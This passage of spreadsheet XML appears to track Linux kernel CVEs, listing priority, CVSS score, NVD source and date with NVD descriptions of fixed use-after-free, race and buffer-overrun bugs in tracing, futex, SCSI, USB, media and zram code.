      <c r="G523" s="5" t="inlineStr"/>
      <c r="H523" s="5" t="inlineStr"/>
      <c r="I523" s="5" t="inlineStr"/>
      <c r="J523" s="5" t="inlineStr"/>
      <c r="K523" s="5" t="inlineStr"/>
      <c r="L523" s="5" t="inlineStr"/>
      <c r="M523" s="5" t="inlineStr"/>
      <c r="N523" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O523" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P523" s="5" t="inlineStr"/>
      <c r="Q523" s="5" t="inlineStr"/>
      <c r="R523" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
ftrace: Take trace_array reference before accessing its ftrace_ops
The trace instance files set_ftrace_filter and set_ftrace_notrace was
updated to work with specific trace instances (trace_arrays). The issue is
that when these files are opened, there is a small race window where it
will use the ftrace_ops from the inode-&gt;private pointer to get a reference
to the trace_array and then take its reference. The problem is that the
ftrace_ops itself could be freed. If the rmdir on the instance happens at
the same time the set_ftrace_filter file is opened, the rmdir could have
also freed the ftrace_ops and referencing it will cause a use-after-free
bug and crash the kernel.
Instead, pass in the trace_array as the file private data (NULL for the
top level instance), and then pass both the trace_array and the ftrace_ops
to the ftrace_regex_open() function. If the trace_array is NULL, then it
just uses the ftrace_ops without the need to take its reference (like
normal). If the ftrace_ops is NULL, that is only the case for the top
level instance and the global_ops can be used.
This allows the trace_array to have its reference incremented before
touching the ftrace_ops that could also be freed when the instance is.</t>
        </is>
      </c>
      <c r="S523" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90002</t>
        </is>
      </c>
    </row>
    <row r="524">
      <c r="A524" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B524" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C524" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90003</t>
        </is>
      </c>
      <c r="D524" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E524" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F524" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G524" s="5" t="inlineStr"/>
      <c r="H524" s="5" t="inlineStr"/>
      <c r="I524" s="5" t="inlineStr"/>
      <c r="J524" s="5" t="inlineStr"/>
      <c r="K524" s="5" t="inlineStr"/>
      <c r="L524" s="5" t="inlineStr"/>
      <c r="M524" s="5" t="inlineStr"/>
      <c r="N524" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O524" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P524" s="5" t="inlineStr"/>
      <c r="Q524" s="5" t="inlineStr"/>
      <c r="R524" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
futex: Prevent rcuwait use-after-free during requeue PI
On PREEMPT_RT, FUTEX_CMP_REQUEUE_PI can trigger a KASAN report
(slab-out-of-bounds) in futex_requeue_pi_complete() invocation of
rcuwait_wake_up().
The futex_q used by futex_wait_requeue_pi() is allocated on the waiter's
stack. An early wakeup can race with a PI requeue as follows:
        waiter                          requeue task
        ------                          ------------
futex_wait_requeue_pi()
  futex_do_wait()
    schedule()
                                       futex_requeue
                                         futex_proxy_trylock_atomic()
                                           futex_requeue_pi_prepare()
                                            Q_REQUEUE_PI_NONE -&gt; Q_REQUEUE_PI_IN_PROGRESS
* timeout/ signal wakes waiter *
  futex_requeue_pi_wakeup_sync()
   Q_REQUEUE_PI_IN_PROGRESS -&gt; Q_REQUEUE_PI_WAIT
                                           requeue_pi_wake_futex
                                             futex_requeue_pi_complete()
                                               cmpxchg Q_REQUEUE_PI_WAIT -&gt; Q_REQUEUE_PI_LOCKED
    rcuwait_wait_event()
      if (atomic_read(&amp;q-&gt;requeue_state) != Q_REQUEUE_PI_WAIT)
       break /* no schedule() */
 /* q.pi_state-&gt;owner == current */
 futex_private_hash_put()
 /* return from syscall */
                                              rcuwait_wake_up(&amp;q-&gt;requeue_wait)
                                                /* q is gone */
futex_requeue_pi_complete() publishes Q_REQUEUE_PI_LOCKED before
calling rcuwait_wake_up(). The waiter observes this state in
rcuwait_wait_event() before invoking schedule() in rcuwait_wait_event().
Here, the waiter is free leave the syscall before requeue task can
complete the wake.
To address this race skip rcuwait_wake_up() in the Q_REQUEUE_PI_LOCKED
case.
This state is only published by requeue_pi_wake_futex(), which saves
q-&gt;task before futex_requeue_pi_complete() and wakes the waiter via
wake_up_state().
This wake is intended to wake the waiter from its futex_do_wait() sleep.
If the waiter is still sleeping there, it can not get into the
Q_REQUEUE_PI_WAIT state (and require this removed wake).
Should the waiter be woken up from futex_do_wait() by other means (as in
this example) and sleep in futex_requeue_pi_wakeup_sync() then the
wake_up_state() from requeue_pi_wake_futex() will wake it, too.
Should the waiter task terminate before wake_up_state() had a chance to
wake the task then the task pointer does not become invalid because the
futex_hash_bucket::lock is held and the task pointer is RCU protected.
[bigeasy: Updated comment and commit message]</t>
        </is>
      </c>
      <c r="S524" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90003</t>
        </is>
      </c>
    </row>
    <row r="525">
      <c r="A525" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B525" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C525" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90007</t>
        </is>
      </c>
      <c r="D525" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E525" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F525" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G525" s="5" t="inlineStr"/>
      <c r="H525" s="5" t="inlineStr"/>
      <c r="I525" s="5" t="inlineStr"/>
      <c r="J525" s="5" t="inlineStr"/>
      <c r="K525" s="5" t="inlineStr"/>
      <c r="L525" s="5" t="inlineStr"/>
      <c r="M525" s="5" t="inlineStr"/>
      <c r="N525" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O525" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P525" s="5" t="inlineStr"/>
      <c r="Q525" s="5" t="inlineStr"/>
      <c r="R525" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
scsi: pm8001: Use rollback index when freeing MSI-X vectors
pm8001_request_msix() unwinds previously registered handlers with
free_irq() when request_irq() fails. The rollback loop uses the failing
index i for every iteration instead of the already registered vector
index j.
That passes the wrong IRQ/dev_id pair to free_irq() and leaves the
earlier handlers installed. Use j for both pci_irq_vector() and the
matching irq_vector entry in the rollback loop.</t>
        </is>
      </c>
      <c r="S525" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90007</t>
        </is>
      </c>
    </row>
    <row r="526">
      <c r="A526" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B526" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C526" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90008</t>
        </is>
      </c>
      <c r="D526" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E526" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F526" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G526" s="5" t="inlineStr"/>
      <c r="H526" s="5" t="inlineStr"/>
      <c r="I526" s="5" t="inlineStr"/>
      <c r="J526" s="5" t="inlineStr"/>
      <c r="K526" s="5" t="inlineStr"/>
      <c r="L526" s="5" t="inlineStr"/>
      <c r="M526" s="5" t="inlineStr"/>
      <c r="N526" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O526" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P526" s="5" t="inlineStr"/>
      <c r="Q526" s="5" t="inlineStr"/>
      <c r="R526" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
scsi: megaraid_sas: Limit NVMe request size to the PRP chain frame
megasas_make_prp_nvme() builds a command's PRP list in cmd-&gt;sg_frame, a
DMA pool buffer of instance-&gt;max_chain_frame_sz bytes, spending one
entry per NVMe page of the transfer plus one per page of the buffer for
the chain pointer. The loop runs until the transfer is described and
never checks the buffer bound.
max_hw_sectors comes straight from the MDTS the firmware reports for the
drive. On drives with a large MDTS the only thing keeping the list
inside the buffer was the block layer default of 1280 KiB, which needs
320 entries, which fit into a 4 KiB frame as that holds 512. But since
commit 9b8b84879d4a ("block: Increase BLK_DEF_MAX_SECTORS_CAP") that
default is 4 MiB, and such a transfer needs 1025 entries, so the list
runs a full page past the end of the frame:
  sd 1:0:1:0: [sdb] tag#630 page boundary ptr_sgl: 0x00000000ba62d13f
  BUG: unable to handle page fault for address: ff663bcb81e7c000
  #PF: supervisor write access in kernel mode
  #PF: error_code(0x0002) - not-present page
  RIP: 0010:megasas_build_and_issue_cmd_fusion+0xeaa/0x1870 [megaraid_sas]
If the page after the frame happens to be mapped, the overrun does not
fault but silently corrupts the neighbouring pool entry, which is
another in-flight command's PRP list.
Cap max_hw_sectors at what the chain frame can describe, less one page
for transfers that do not start on a page boundary and so need one entry
more. This is the megaraid_sas counterpart of commit 04631f55afc5
("scsi: mpt3sas: Limit NVMe request size to 2 MiB"), but derives the
limit from max_chain_frame_sz rather than hardcoding it.</t>
        </is>
      </c>
      <c r="S526" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90008</t>
        </is>
      </c>
    </row>
    <row r="527">
      <c r="A527" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B527" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C527" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90009</t>
        </is>
      </c>
      <c r="D527" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E527" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F527" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G527" s="5" t="inlineStr"/>
      <c r="H527" s="5" t="inlineStr"/>
      <c r="I527" s="5" t="inlineStr"/>
      <c r="J527" s="5" t="inlineStr"/>
      <c r="K527" s="5" t="inlineStr"/>
      <c r="L527" s="5" t="inlineStr"/>
      <c r="M527" s="5" t="inlineStr"/>
      <c r="N527" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O527" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P527" s="5" t="inlineStr"/>
      <c r="Q527" s="5" t="inlineStr"/>
      <c r="R527" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
scsi: bsg: Fix TOCTOU in io_uring passthrough command setup
scsi_bsg_uring_cmd() reads bsg_uring_cmd from the shared mmap'd SQE.
Userspace can change a field after we check it and before we use it.
request_len is the sharp case: it can grow past sizeof(scmd-&gt;cmnd) after
the bound check and overflow scmd-&gt;cmnd in copy_from_user().
READ_ONCE() the SQE fields we check or use into locals before use.</t>
        </is>
      </c>
      <c r="S527" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90009</t>
        </is>
      </c>
    </row>
    <row r="528">
      <c r="A528" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B528" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C528" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90010</t>
        </is>
      </c>
      <c r="D528" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E528" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F528" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G528" s="5" t="inlineStr"/>
      <c r="H528" s="5" t="inlineStr"/>
      <c r="I528" s="5" t="inlineStr"/>
      <c r="J528" s="5" t="inlineStr"/>
      <c r="K528" s="5" t="inlineStr"/>
      <c r="L528" s="5" t="inlineStr"/>
      <c r="M528" s="5" t="inlineStr"/>
      <c r="N528" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O528" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P528" s="5" t="inlineStr"/>
      <c r="Q528" s="5" t="inlineStr"/>
      <c r="R528" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
scsi: bsg: Cap io_uring sense copy to max_response_len
Completion copied scmd-&gt;sense_len to the user response buffer without
honoring max_response_len. After a valid sense, the midlayer sets
sense_len to the real length (up to SCSI_SENSE_BUFFERSIZE), so a smaller
user buffer was overrun.</t>
        </is>
      </c>
      <c r="S528" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90010</t>
        </is>
      </c>
    </row>
    <row r="529">
      <c r="A529" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B529" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C529" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90013</t>
        </is>
      </c>
      <c r="D529" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E529" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F529" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G529" s="5" t="inlineStr"/>
      <c r="H529" s="5" t="inlineStr"/>
      <c r="I529" s="5" t="inlineStr"/>
      <c r="J529" s="5" t="inlineStr"/>
      <c r="K529" s="5" t="inlineStr"/>
      <c r="L529" s="5" t="inlineStr"/>
      <c r="M529" s="5" t="inlineStr"/>
      <c r="N529" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O529" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P529" s="5" t="inlineStr"/>
      <c r="Q529" s="5" t="inlineStr"/>
      <c r="R529" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
tracing: Take trace_array reference when opening options file
The options files do not take the trace_array reference for the options
they represent. This could cause a use-after-free kernel crash if one of
these files is opened by one task and another task removes the instance
that the option is for. Because it doesn't take a reference upon opening,
it will not stop the removal which will free the options descriptor that
is being used.
As the options are somewhat dynamic in their creation at boot up, each
file represents a flag in the trace_array. The trace_array has an array of
indexes to represent each of these flags that is stored in the
trace_flags_index array. The address of the index array element is used to
pass to the inode-&gt;i_private pointer. Then that element is read which
holds the index (which represents the flag) and then the index is used to
calculate the trace_array descriptor from its trace_flags_index array.
One issue is that the index element can not be referenced until the
trace_array's reference is taken. To handle this, create a new helper
function called: trace_array_options_get() that will iterate all the
existing trace_arrays in the ftrace_trace_arrays list (under the
trace_types_lock), and compare the passed in address of the index element
with the entire array of the trace_array's trace_flags_index array.
If it matches, then up the corresponding trace_array's reference and
return.</t>
        </is>
      </c>
      <c r="S529" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90013</t>
        </is>
      </c>
    </row>
    <row r="530">
      <c r="A530" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B530" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C530" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90014</t>
        </is>
      </c>
      <c r="D530" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E530" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F530" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G530" s="5" t="inlineStr"/>
      <c r="H530" s="5" t="inlineStr"/>
      <c r="I530" s="5" t="inlineStr"/>
      <c r="J530" s="5" t="inlineStr"/>
      <c r="K530" s="5" t="inlineStr"/>
      <c r="L530" s="5" t="inlineStr"/>
      <c r="M530" s="5" t="inlineStr"/>
      <c r="N530" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O530" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P530" s="5" t="inlineStr"/>
      <c r="Q530" s="5" t="inlineStr"/>
      <c r="R530" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
tracing: Have show_event_filters/triggers files take trace array ref
The newly added files show_event_filters and show_event_triggers that show
all filters or triggers that are set within the trace array do not take a
reference for the trace array it is showing. Without taking a reference,
the trace_array may be freed via "rmdir" while a task is reading one of
theses files. Those files iterate all the events within an instance
(trace_array) and nothing prevents that instance from being freed while
its data is being read. This causes a use-after-free crash.
Have the open of both those files take the trace_array reference via the
trace_array_get() that prevents the trace_array from being freed while the
files are opened.</t>
        </is>
      </c>
      <c r="S530" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90014</t>
        </is>
      </c>
    </row>
    <row r="531">
      <c r="A531" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B531" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C531" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90022</t>
        </is>
      </c>
      <c r="D531" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E531" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F531" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G531" s="5" t="inlineStr"/>
      <c r="H531" s="5" t="inlineStr"/>
      <c r="I531" s="5" t="inlineStr"/>
      <c r="J531" s="5" t="inlineStr"/>
      <c r="K531" s="5" t="inlineStr"/>
      <c r="L531" s="5" t="inlineStr"/>
      <c r="M531" s="5" t="inlineStr"/>
      <c r="N531" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O531" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P531" s="5" t="inlineStr"/>
      <c r="Q531" s="5" t="inlineStr"/>
      <c r="R531" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
usb: gadget: f_midi2: fix use-after-free in string attribute show path
f_midi2_opts_str_show() takes the string lock internally, but its
callers dereference the opts-&gt;info.&lt;field&gt; pointer before calling it,
outside the lock. This races with f_midi2_opts_str_store(), which
frees the old string under opts-&gt;lock when the attribute is written
concurrently, the show path can read a pointer that gets freed
before the lock inside str_show() is even taken.
Change f_midi2_opts_str_show() to take a pointer to the string field,
matching the existing pattern in f_midi2_opts_str_store(), and
dereference it only after the lock is held. Update all three callers
(iface_name, block name, and the EP string option macro) accordingly.</t>
        </is>
      </c>
      <c r="S531" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90022</t>
        </is>
      </c>
    </row>
    <row r="532">
      <c r="A532" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B532" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C532" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90026</t>
        </is>
      </c>
      <c r="D532" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E532" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F532" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G532" s="5" t="inlineStr"/>
      <c r="H532" s="5" t="inlineStr"/>
      <c r="I532" s="5" t="inlineStr"/>
      <c r="J532" s="5" t="inlineStr"/>
      <c r="K532" s="5" t="inlineStr"/>
      <c r="L532" s="5" t="inlineStr"/>
      <c r="M532" s="5" t="inlineStr"/>
      <c r="N532" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O532" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P532" s="5" t="inlineStr"/>
      <c r="Q532" s="5" t="inlineStr"/>
      <c r="R532" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
usb: typec: qcom-pmic: cancel reset_work on stop
pdphy_stop() disables IRQs but leaves reset_work pending.  If the IRQ
handler schedules it just before disable_irq(), the work runs after
remove() frees the struct via devm.
Call cancel_work_sync() after disabling IRQs to close the window.
This issue was found by an in-house static analysis tool.</t>
        </is>
      </c>
      <c r="S532" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90026</t>
        </is>
      </c>
    </row>
    <row r="533">
      <c r="A533" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B533" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C533" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90027</t>
        </is>
      </c>
      <c r="D533" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E533" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F533" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G533" s="5" t="inlineStr"/>
      <c r="H533" s="5" t="inlineStr"/>
      <c r="I533" s="5" t="inlineStr"/>
      <c r="J533" s="5" t="inlineStr"/>
      <c r="K533" s="5" t="inlineStr"/>
      <c r="L533" s="5" t="inlineStr"/>
      <c r="M533" s="5" t="inlineStr"/>
      <c r="N533" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O533" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P533" s="5" t="inlineStr"/>
      <c r="Q533" s="5" t="inlineStr"/>
      <c r="R533" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
usb: typec: qcom-pmic-typec: disable cc_debounce_dwork on stop
cc_debounce_dwork is queued from the set_cc() and start_toggling()
callbacks, which run from TCPM's kthread worker.  port_stop() returns
before tcpm_unregister_port() destroys that worker.  Flushing the worker
during unregister may therefore run a callback which queues the delayed
work after port_stop() has returned.
The delayed work can then run after devres has freed pmic_typec_port.
Use disable_delayed_work_sync() in port_stop() to cancel a pending
instance and prevent the TCPM callbacks from queueing another one.
This issue was found by an in-house static analysis tool.</t>
        </is>
      </c>
      <c r="S533" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90027</t>
        </is>
      </c>
    </row>
    <row r="534">
      <c r="A534" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B534" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C534" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90030</t>
        </is>
      </c>
      <c r="D534" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E534" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F534" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G534" s="5" t="inlineStr"/>
      <c r="H534" s="5" t="inlineStr"/>
      <c r="I534" s="5" t="inlineStr"/>
      <c r="J534" s="5" t="inlineStr"/>
      <c r="K534" s="5" t="inlineStr"/>
      <c r="L534" s="5" t="inlineStr"/>
      <c r="M534" s="5" t="inlineStr"/>
      <c r="N534" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O534" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P534" s="5" t="inlineStr"/>
      <c r="Q534" s="5" t="inlineStr"/>
      <c r="R534" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
usb: dwc3: clear forceRM when issuing EndTransfer
The forceRM bit of the DEPCMD register controls the behavior of the
EndTransfer command used to stop an active transfer. Older DWC3
programming guide revisions recommended setting forceRM=1 when
issuing EndTransfer. Newer programming guide revisions recommend
issuing EndTransfer with forceRM cleared.
With forceRM=1 on DWC_usb31 v2.00a and v2.10a controllers, a transfer
aborted through the ep_dequeue path was observed to remain active
after EndTransfer completion. A subsequent StartTransfer issued on the
same endpoint triggered writes associated with the aborted transfer.
This resulted in an SMMU fault because the transfer buffer had already
been unmapped during EndTransfer command-completion cleanup.
Using forceRM=0 eliminates the issue. Although older DWC3 programming
guide revisions recommended setting forceRM=1, no issues are known
from using forceRM=0. Clear forceRM when issuing EndTransfer to provide
consistent EndTransfer behavior and align with newer programming guide
recommendations.</t>
        </is>
      </c>
      <c r="S534" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90030</t>
        </is>
      </c>
    </row>
    <row r="535">
      <c r="A535" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B535" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C535" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90032</t>
        </is>
      </c>
      <c r="D535" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E535" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F535" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G535" s="5" t="inlineStr"/>
      <c r="H535" s="5" t="inlineStr"/>
      <c r="I535" s="5" t="inlineStr"/>
      <c r="J535" s="5" t="inlineStr"/>
      <c r="K535" s="5" t="inlineStr"/>
      <c r="L535" s="5" t="inlineStr"/>
      <c r="M535" s="5" t="inlineStr"/>
      <c r="N535" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O535" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P535" s="5" t="inlineStr"/>
      <c r="Q535" s="5" t="inlineStr"/>
      <c r="R535" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
media: usbtv: keep device alive while ALSA card exists
The ALSA PCM callbacks store the driver state in pcm-&gt;private_data. An
open PCM file can outlive USB disconnect because usbtv_audio_free() uses
snd_card_free_when_closed(). The disconnect path can then drop the V4L2
device reference and free struct usbtv before ALSA releases the substream,
so a later close dereferences freed memory in snd_usbtv_pcm_close().
Take a V4L2 device reference for the ALSA card and drop it from the card
private_free callback. This keeps struct usbtv valid until ALSA has closed
the remaining files and freed the card.</t>
        </is>
      </c>
      <c r="S535" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90032</t>
        </is>
      </c>
    </row>
    <row r="536">
      <c r="A536" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B536" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C536" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90043</t>
        </is>
      </c>
      <c r="D536" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E536" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F536" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G536" s="5" t="inlineStr"/>
      <c r="H536" s="5" t="inlineStr"/>
      <c r="I536" s="5" t="inlineStr"/>
      <c r="J536" s="5" t="inlineStr"/>
      <c r="K536" s="5" t="inlineStr"/>
      <c r="L536" s="5" t="inlineStr"/>
      <c r="M536" s="5" t="inlineStr"/>
      <c r="N536" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O536" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P536" s="5" t="inlineStr"/>
      <c r="Q536" s="5" t="inlineStr"/>
      <c r="R536" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
zram: fix slot lock bit position on big-endian 64-bit
The slot lock is a bit operation on the whole __lock word, which flags and
ac_time alias as two u32s.  On little-endian the lock bit lands in the
position ZRAM_ENTRY_LOCK reserves in flags, so the aliasing works out.  On
64-bit big-endian it lands in ac_time instead: with
ZRAM_TRACK_ENTRY_ACTIME enabled, storing the access time from
mark_slot_accessed() or slot_free() wipes out the held lock bit, letting
